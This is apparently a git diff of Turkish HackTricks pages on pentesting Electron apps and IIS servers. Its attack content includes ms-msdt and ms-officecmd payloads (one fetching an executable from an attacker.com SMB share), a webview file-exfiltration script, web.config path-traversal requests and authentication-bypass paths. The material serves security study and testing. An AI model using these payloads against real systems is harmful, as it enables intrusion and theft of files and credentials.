_**contextIsolation**_, **web sayfası betikleri ile JavaScript Electron'un dahili kodları arasında ayrı bağlamlar** tanıtarak her kodun JavaScript yürütmesinin birbirini etkilememesini sağlar. Bu, RCE olasılığını ortadan kaldırmak için gerekli bir özelliktir.
|
||||
|
||||
Bağlamlar izole edilmediğinde bir saldırgan şunları yapabilir:
|
||||
|
||||
1. **Renderer'da keyfi JavaScript yürütme** (XSS veya harici sitelere yönlendirme)
|
||||
2. Preload veya Electron dahili kodunda kullanılan **dahili yöntemi üzerine yazma**
|
||||
3. **Üzerine yazılan fonksiyonun tetiklenmesi**
|
||||
1. **Renderer'da keyfi JavaScript yürütmek** (XSS veya harici sitelere yönlendirme)
|
||||
2. Preload veya Electron dahili kodunda kullanılan **dahili yöntemi üzerine yazmak**
|
||||
3. **Üzerine yazılan fonksiyonun kullanılmasını tetiklemek**
|
||||
4. RCE?
|
||||
|
||||
Dahili yöntemlerin üzerine yazılabileceği 2 yer vardır: Preload kodunda veya Electron dahili kodunda:
|
||||
|
@ -199,32 +199,32 @@ Dahili yöntemlerin üzerine yazılabileceği 2 yer vardır: Preload kodunda vey
|
|||
|
||||
### Tıklama etkinini atlatma
|
||||
|
||||
Bir bağlantıya tıkladığınızda kısıtlamalar uygulandıysa, bunları atlayabilir ve bunun yerine düzenli bir sol tıklama yerine **orta tıklama** yaparak atlayabilirsiniz.
|
||||
Bir bağlantıya tıkladığınızda kısıtlamalar uygulanmışsa, bunları atlayabilirsiniz **normal sol tıklama** yerine orta tıklama yaparak.
|
||||
```javascript
|
||||
window.addEventListener('click', (e) => {
|
||||
```
|
||||
## shell.openExternal Aracılığıyla Uzaktan Kod Yürütme (RCE)
|
||||
## shell.openExternal Aracılığıyla Uzaktan Kod Çalıştırma (RCE)
|
||||
|
||||
Bu örnekler hakkında daha fazla bilgi için [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) ve [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/) adreslerini kontrol edebilirsiniz.
|
||||
|
||||
Bir Electron masaüstü uygulaması dağıtılırken, `nodeIntegration` ve `contextIsolation` için doğru ayarların yapılması hayati önem taşır. Bu ayarların yapıldığı durumlarda, **istemci tarafından uzaktan kod yürütme (RCE)**, preload betiklerini veya Electron'un ana işleminden gelen yerel kodu hedef alan etkili bir şekilde engellenir.
|
||||
Bir Electron masaüstü uygulaması dağıtılırken, `nodeIntegration` ve `contextIsolation` için doğru ayarların yapılması hayati önem taşır. Bu ayarların mevcut olmasıyla, ana işlemdeki preload betiklerine veya Electron'un yerel koduna yönelik **istemci tarafından uzaktan kod çalıştırma (RCE)** etkili bir şekilde engellenir.
|
||||
|
||||
Kullanıcıların bağlantılara etkileşimde bulunması veya yeni pencereler açması durumunda, belirli olay dinleyicileri tetiklenir; bu, uygulamanın güvenliği ve işlevselliği için önemlidir:
|
||||
Kullanıcıların bağlantılara etkileşimde bulunması veya yeni pencereler açması durumunda, uygulamanın güvenliği ve işlevselliği için önemli olan belirli olay dinleyicileri tetiklenir:
|
||||
```javascript
|
||||
webContents.on("new-window", function (event, url, disposition, options) {}
|
||||
webContents.on("will-navigate", function (event, url) {}
|
||||
```
|
||||
Bu dinleyiciler, masaüstü uygulaması tarafından **üzerine yazılarak** kendi **iş mantığını** uygulamak için kullanılır. Uygulama, yönlendirilen bir bağlantının dahili olarak mı yoksa harici bir web tarayıcısında mı açılması gerektiğini değerlendirir. Bu karar genellikle `openInternally` işlevi aracılığıyla yapılır. Bu işlev `false` döndürürse, bağlantının `shell.openExternal` işlevini kullanarak harici olarak açılması gerektiğini gösterir.
|
||||
Bu dinleyiciler, masaüstü uygulaması tarafından **üzerine yazılarak** kendi **iş mantığını** uygulamak için kullanılır. Uygulama, gezinilen bir bağlantının dahili olarak mı yoksa harici bir web tarayıcısında mı açılması gerektiğini değerlendirir. Bu karar genellikle `openInternally` işlevi aracılığıyla yapılır. Bu işlev `false` döndürürse, bağlantının harici olarak açılması gerektiğini gösterir ve `shell.openExternal` işlevini kullanır.
|
||||
|
||||
**İşte basitleştirilmiş bir yalancı kod:**
|
||||
**İşte basitleştirilmiş bir sözdizimi:**
|
||||
|
||||
![https://miro.medium.com/max/1400/1\*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (258).png>)
|
||||
|
||||
![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (960).png>)
|
||||
|
||||
Electron JS güvenlik en iyi uygulamaları, `openExternal` işlevi ile güvensiz içeriği kabul etmemeyi önerir, çünkü bu çeşitli protokoller aracılığıyla RCE'ye yol açabilir. İşletim sistemleri, bu zafiyeti sömürebilecek farklı protokolleri destekler. Bu konuda detaylı örnekler ve daha fazla açıklama için [bu kaynağa](https://positive.security/blog/url-open-rce#windows-10-19042) başvurulabilir. Bu kaynak, bu zafiyeti sömürebilen Windows protokol örneklerini içerir.
|
||||
Electron JS güvenlik en iyi uygulamaları, `openExternal` işlevi ile güvensiz içeriği kabul etmemeyi önerir, çünkü bu çeşitli protokoller aracılığıyla RCE'ye yol açabilir. İşletim sistemleri, RCE'ye neden olabilecek farklı protokolleri destekler. Bu konuda detaylı örnekler ve daha fazla açıklama için [bu kaynağa](https://positive.security/blog/url-open-rce#windows-10-19042) başvurulabilir; bu kaynak, bu zafiyeti sömürebilen Windows protokol örneklerini içerir.
|
||||
|
||||
**Windows protokolü zafiyet örnekleri şunları içerir:**
|
||||
**Windows protokolü saldırılarının örnekleri şunları içerir:**
|
||||
```html
|
||||
<script>
|
||||
window.open("ms-msdt:id%20PCWDiagnostic%20%2Fmoreoptions%20false%20%2Fskip%20true%20%2Fparam%20IT_BrowseForFile%3D%22%5Cattacker.comsmb_sharemalicious_executable.exe%22%20%2Fparam%20IT_SelectProgram%3D%22NotListed%22%20%2Fparam%20IT_AutoTroubleshoot%3D%22ts_AUTO%22")
|
||||
|
@ -240,11 +240,11 @@ window.open("ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResu
|
|||
```
|
||||
## Dahili Dosyaları Okuma: XSS + contextIsolation
|
||||
|
||||
**`contextIsolation` devre dışı bırakıldığında `<webview>` etiketlerinin kullanımına izin verilir**, `<iframe>` gibi, yerel dosyaları okumak ve dışa aktarmak için. Bir örnek, bu zafiyeti sömürmek için iç dosyaların içeriğini okumayı göstermektedir:
|
||||
**`contextIsolation` devre dışı bırakıldığında `<webview>` etiketlerinin kullanılmasına izin verilir**, `<iframe>` ile benzer şekilde, yerel dosyaların okunması ve dışa aktarılması için. Bir örnek, bu zafiyetin nasıl sömürüleceğini ve dahili dosyaların içeriğinin nasıl okunacağını göstermektedir:
|
||||
|
||||
![](<../../../.gitbook/assets/1 u1jdRYuWAEVwJmf_F2ttJg (1).png>)
|
||||
|
||||
Daha da ileri gidilerek, bir **dahili dosyayı okuma** yöntemi paylaşılır ve bir Electron masaüstü uygulamasında kritik bir yerel dosya okuma zafiyeti vurgulanır. Bu, uygulamayı sömürmek ve veri dışa aktarmak için bir betik enjekte etmeyi içerir:
|
||||
Daha da ileri gidilerek, bir **dahili dosyanın okunması** için başka bir yöntem paylaşılmış ve bir Electron masaüstü uygulamasında kritik bir yerel dosya okuma zafiyeti vurgulanmıştır. Bu, uygulamayı sömürmek ve verileri dışa aktarmak için bir betik enjekte etmeyi içerir:
|
||||
```html
|
||||
<br><BR><BR><BR>
|
||||
<h1>pwn<br>
|
||||
|
@ -260,16 +260,16 @@ Bir örneği bu **makalede** görebilirsiniz: [https://blog.electrovolt.io/posts
|
|||
|
||||
## **Dahili URL regex atlatma ile XSS Phishing**
|
||||
|
||||
Bir XSS bulduysanız ancak **RCE tetikleyemez veya dahili dosyaları çalamazsanız**, bunu **phishing yoluyla kimlik bilgilerini çalmak** için kullanmaya çalışabilirsiniz.
|
||||
Bir XSS bulduysanız ancak **RCE tetikleyemez veya dahili dosyaları çalamazsanız**, bunu **phishing aracılığıyla kimlik bilgilerini çalmak** için kullanmaya çalışabilirsiniz.
|
||||
|
||||
Öncelikle, yeni bir URL açmaya çalıştığınızda ne olduğunu bilmelisiniz, ön uçtaki JS kodunu kontrol ederek:
|
||||
```javascript
|
||||
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
|
||||
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
|
||||
```
|
||||
**`openInternally`** fonksiyonuna yapılan çağrı, bağlantının platforma ait bir bağlantı olup olmadığına karar verecektir, ya da 3. taraf bir kaynak olarak tarayıcıda açılacaktır.
|
||||
**`openInternally`** işlemi, bağlantının platforma ait bir bağlantı olup olmadığına karar verecektir, ya bağlantıyı masaüstü penceresinde açacak ya da tarayıcıda 3. taraf bir kaynak olarak açacaktır.
|
||||
|
||||
Fonksiyon tarafından kullanılan **regex**'in (örneğin, alt alanların noktalarını kaçırmadan) **atlatılabilir** olması durumunda, saldırgan XSS'i **kullanarak kullanıcıdan kimlik bilgilerini isteyen** saldırgan altyapısında bulunan yeni bir pencere açabilir:
|
||||
Eğer işlev tarafından kullanılan **regex**, (örneğin alt alan adlarının noktalarını kaçırmadan) **atlatmalara karşı savunmasız** ise, saldırgan XSS'i **kullanarak kullanıcıdan kimlik bilgilerini isteyen** saldırgan altyapısında **yeni bir pencere açabilir**:
|
||||
```html
|
||||
<script>
|
||||
window.open("<http://subdomainagoogleq.com/index.html>")
|
||||
|
@ -280,7 +280,7 @@ window.open("<http://subdomainagoogleq.com/index.html>")
|
|||
* [**Electronegativity**](https://github.com/doyensec/electronegativity), Electron tabanlı uygulamalardaki yanlış yapılandırmaları ve güvenlik karşı desenleri belirlemek için bir araçtır.
|
||||
* [**Electrolint**](https://github.com/ksdmitrieva/electrolint), Electronegativity kullanan Electron uygulamaları için açık kaynaklı bir VS Code eklentisidir.
|
||||
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan), zafiyetli üçüncü taraf kütüphaneleri kontrol etmek için kullanılır.
|
||||
* [**Electro.ng**](https://electro.ng/): Satın almanız gerekmektedir.
|
||||
* [**Electro.ng**](https://electro.ng/): Satın almanız gerekmektedir
|
||||
|
||||
## Labaratuvarlar
|
||||
|
||||
|
@ -319,15 +319,15 @@ npm start
|
|||
* Electron güvenliği hakkında daha fazla araştırma ve yazılar için [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
|
||||
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) bir şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan bir **dark-web** destekli bir arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize** edilip edilmediğini kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -335,12 +335,12 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family'yi keşfedin**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar göndererek paylaşın.
|
||||
* [**The PEASS Family'yi keşfedin**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud github depolarına PR'lar göndererek paylaşın.**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
|
@ -14,9 +14,9 @@ HackTricks'ı desteklemenin diğer yolları:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
|
@ -35,7 +35,7 @@ Test edilebilir dosya uzantıları:
|
|||
* config
|
||||
* php
|
||||
|
||||
## Dahili IP Adresi Açığa Çıkarma
|
||||
## Dahili IP Adresi ifşası
|
||||
|
||||
302 alınan herhangi bir IIS sunucusunda, Host başlığını kaldırmayı deneyebilir ve HTTP/1.0 kullanarak içerideki yanıtın Location başlığının sizi dahili IP adresine yönlendirebileceğini deneyebilirsiniz:
|
||||
```
|
||||
|
@ -43,11 +43,7 @@ nc -v domain.com 80
|
|||
openssl s_client -connect domain.com:443
|
||||
```
|
||||
```html
|
||||
<p>Internal IP Address: 192.168.1.10</p>
|
||||
```
|
||||
|
||||
```html
|
||||
<p>İç IP Adresi: 192.168.1.10</p>
|
||||
<p>Yanıt iç IP adresini ifşa ediyor:</p>
|
||||
```
|
||||
```
|
||||
GET / HTTP/1.0
|
||||
|
@ -89,12 +85,12 @@ Uzantı eklemeksizin kullanın, ihtiyacı olan dosyalar zaten ekli.
|
|||
Tam açıklamayı kontrol edin: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
|
||||
|
||||
{% hint style="info" %}
|
||||
Özet olarak, uygulamanın klasörlerinde "**assemblyIdentity**" dosyalarına ve "**namespaces**"e referans veren birkaç web.config dosyası bulunmaktadır. Bu bilgi ile **uygulamanın nerede yürütülebilir dosyaların bulunduğunu** bilmek mümkündür ve bunları indirebilirsiniz.\
|
||||
İndirilen Dll'lerden yeni **namespaces** bulunabilir ve erişmeye çalışmanız gereken yeni namespaces ve assemblyIdentity'leri bulmak için web.config dosyasını alabilirsiniz.\
|
||||
Özet olarak, uygulamanın klasörlerinde "**assemblyIdentity**" dosyalarına ve "**namespaces**"e referans veren birkaç web.config dosyası bulunmaktadır. Bu bilgi ile **uygulamaların nerede bulunduğunu** ve indirebileceğinizi bilmek mümkündür.\
|
||||
İndirilen Dll'lerden, **yeni namespaces** bulunabilir ve erişmeye çalışmanız gereken yeni namespaces ve assemblyIdentity'leri bulmak için web.config dosyasını alabilirsiniz.\
|
||||
Ayrıca, **connectionstrings.config** ve **global.asax** dosyaları ilginç bilgiler içerebilir.\\
|
||||
{% endhint %}
|
||||
|
||||
**.Net MVC uygulamalarında**, **web.config** dosyası, uygulamanın her bir ikili dosyaya "**assemblyIdentity**" XML etiketleri aracılığıyla bağımlı olduğunu belirterek önemli bir rol oynar.
|
||||
**.Net MVC uygulamalarında**, **web.config** dosyası, uygulamanın her bir ikili dosyaya **"assemblyIdentity"** XML etiketleri aracılığıyla bağımlı olduğunu belirleyerek önemli bir rol oynar.
|
||||
|
||||
### **İkili Dosyaları Keşfetme**
|
||||
|
||||
|
@ -103,7 +99,7 @@ Aşağıda **web.config** dosyasına erişimin bir örneği gösterilmektedir:
|
|||
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
|
||||
Host: example-mvc-application.minded
|
||||
```
|
||||
Bu istek, çeşitli ayarları ve bağımlılıkları ortaya çıkarır, örneğin:
|
||||
Bu istek çeşitli ayarları ve bağımlılıkları ortaya çıkarır, örneğin:
|
||||
|
||||
* **EntityFramework** sürümü
|
||||
* Web sayfaları, istemci doğrulaması ve JavaScript için **AppSettings**
|
||||
|
@ -115,16 +111,16 @@ Bu ayarlar, belirli dosyaların, örneğin **/bin/WebGrease.dll** gibi, uygulama
|
|||
|
||||
### **Kök Dizin Dosyaları**
|
||||
|
||||
**/global.asax** ve hassas şifreler içeren **/connectionstrings.config** gibi kök dizinde bulunan dosyalar, uygulamanın yapılandırması ve işleyişi için önemlidir.
|
||||
**/global.asax** ve hassas şifreleri içeren **/connectionstrings.config** gibi kök dizinde bulunan dosyalar, uygulamanın yapılandırması ve işleyişi için önemlidir.
|
||||
|
||||
### **Ad Alanları ve Web.Config**
|
||||
|
||||
MVC uygulamaları, her dosyada tekrarlayan deklarasyonlardan kaçınmak için belirli ad alanları için ek **web.config dosyaları** tanımlar. Başka bir **web.config** dosyasını indirmek için yapılan bir istekte olduğu gibi.
|
||||
MVC uygulamaları ayrıca her dosyada tekrarlayan deklarasyonlardan kaçınmak için belirli ad alanları için ek **web.config dosyaları** tanımlar. Başka bir **web.config** dosyasını indirmek için yapılan bir istekte olduğu gibi.
|
||||
```markup
|
||||
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
|
||||
Host: example-mvc-application.minded
|
||||
```
|
||||
### **DLL'lerin İndirilmesi**
|
||||
### **DLL'leri İndirme**
|
||||
|
||||
Özel bir ad alanından bahsedilmesi, /bin dizininde bulunan "**WebApplication1**" adlı bir DLL'ye işaret ediyor. Buna bağlı olarak, **WebApplication1.dll** dosyasını indirmek için bir istek gösterilmiştir:
|
||||
```markup
|
||||
|
@ -133,7 +129,7 @@ Host: example-mvc-application.minded
|
|||
```
|
||||
Bu, /bin dizininde **System.Web.Mvc.dll** ve **System.Web.Optimization.dll** gibi diğer önemli DLL'lerin varlığını işaret eder.
|
||||
|
||||
Bir DLL'nin **WebApplication1.Areas.Minded** adında bir ad alanı içe aktardığı bir senaryoda, saldırgan, /bin klasöründeki diğer DLL'lerin referanslarını ve belirli yapılandırmaları içeren, öngörülebilir yollardaki diğer web.config dosyalarının varlığını çıkarabilir. Örneğin, **/Minded/Views/web.config**'a yapılan bir istek, varlığı gösteren yapılandırmalar ve ad alanları ortaya çıkarabilir, başka bir DLL olan **WebApplication1.AdditionalFeatures.dll**.
|
||||
Bir DLL'nin **WebApplication1.Areas.Minded** adında bir ad alanı içe aktardığı bir senaryoda, saldırgan, /bin klasöründeki diğer DLL'lerin referansları ve belirli yapılandırmaları içeren, öngörülebilir yollardaki diğer web.config dosyalarının varlığını çıkarabilir. Örneğin, **/Minded/Views/web.config**'a yapılan bir istek, varlığı gösteren yapılandırmalar ve ad alanları ortaya çıkarabilir, başka bir DLL olan **WebApplication1.AdditionalFeatures.dll**.
|
||||
|
||||
### Ortak dosyalar
|
||||
|
||||
|
@ -241,7 +237,7 @@ Ayrıca **metasploit**'i kullanabilirsiniz: `use scanner/http/iis_shortname_scan
|
|||
|
||||
**Temel kimlik doğrulamasını** atlayın (**IIS 7.5**) şu yolu deneyerek: `/admin:$i30:$INDEX_ALLOCATION/admin.php` veya `/admin::$INDEX_ALLOCATION/admin.php`
|
||||
|
||||
Bu zayıflığı ve bir öncekinin birleştirerek yeni **klasörler** bulmaya ve kimlik doğrulamasını atlamaya çalışabilirsiniz.
|
||||
Bu **zayıflığı** ve bir önceki zayıflığı **karıştırarak** yeni **klasörler** bulmaya ve kimlik doğrulamasını **atlamaya** çalışabilirsiniz.
|
||||
|
||||
## ASP.NET Trace.AXD etkinleştirilmiş hata ayıklama
|
||||
|
||||
|
@ -261,15 +257,15 @@ ASPXAUTH aşağıdaki bilgileri kullanır:
|
|||
|
||||
* **`validationKey`** (dize): İmza doğrulaması için kullanılacak onaltılık kodlu anahtar.
|
||||
* **`decryptionMethod`** (dize): (varsayılan "AES").
|
||||
* **`decryptionIV`** (dize): onaltılık kodlu başlatma vektörü (sıfırlar vektörüne varsayılan olarak).
|
||||
* **`decryptionIV`** (dize): onaltılık kodlu başlatma vektörü (sıfırların bir vektörüne varsayılan olarak).
|
||||
* **`decryptionKey`** (dize): Şifre çözümü için kullanılacak onaltılık kodlu anahtar.
|
||||
|
||||
Ancak, bazı insanlar bu parametrelerin **varsayılan değerlerini** kullanacak ve **çerez olarak kullanıcı e-postasını** kullanacaklardır. Bu nedenle, ASPXAUTH çerezini kullanan aynı platformu kullanan bir web sitesi bulabilir ve saldırı altındaki sunucuda **taklit etmek istediğiniz kullanıcının e-postasıyla bir kullanıcı oluşturabilirseniz**, ikinci sunucudan gelen çerezi birinci sunucuda kullanarak kullanıcıyı taklit edebilirsiniz.\
|
||||
Bu saldırı, bu [**yazıda**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19) işe yaramıştır.
|
||||
Bu saldırı, bu [**yazıda**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19) çalıştı.
|
||||
|
||||
## Önbelleğe Alınmış Şifrelerle IIS Kimlik Doğrulamasını Atlatma (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
|
||||
|
||||
[Tam rapor burada](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Kodda bir hata, kullanıcı tarafından verilen şifreyi **doğru bir şekilde kontrol etmediği** için, şifre hash'i önbellekte zaten bulunan bir anahtara denk gelirse, saldırgan o kullanıcı olarak giriş yapabilecektir.
|
||||
[Tam rapor burada](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Kodda bir hata, kullanıcı tarafından verilen şifreyi **doğru bir şekilde kontrol etmediği** için, şifresi olan bir saldırganın, önbellekte zaten bulunan bir anahtara denk gelen **şifre hash'ı** varsa, o kullanıcı olarak giriş yapabilecektir.
|
||||
```python
|
||||
# script for sanity check
|
||||
> type test.py
|
||||
|
@ -289,13 +285,13 @@ HTTP/1.1 401 Unauthorized
|
|||
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
|
||||
HTTP/1.1 200 OK
|
||||
```
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize** edilip edilmediğini kontrol etmek için **ücretsiz** işlevler sunan **dark web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılım saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in temel amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -303,14 +299,14 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin!</summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da takip edin.**
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,25 +2,25 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonu
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR göndererek paylaşın.
|
||||
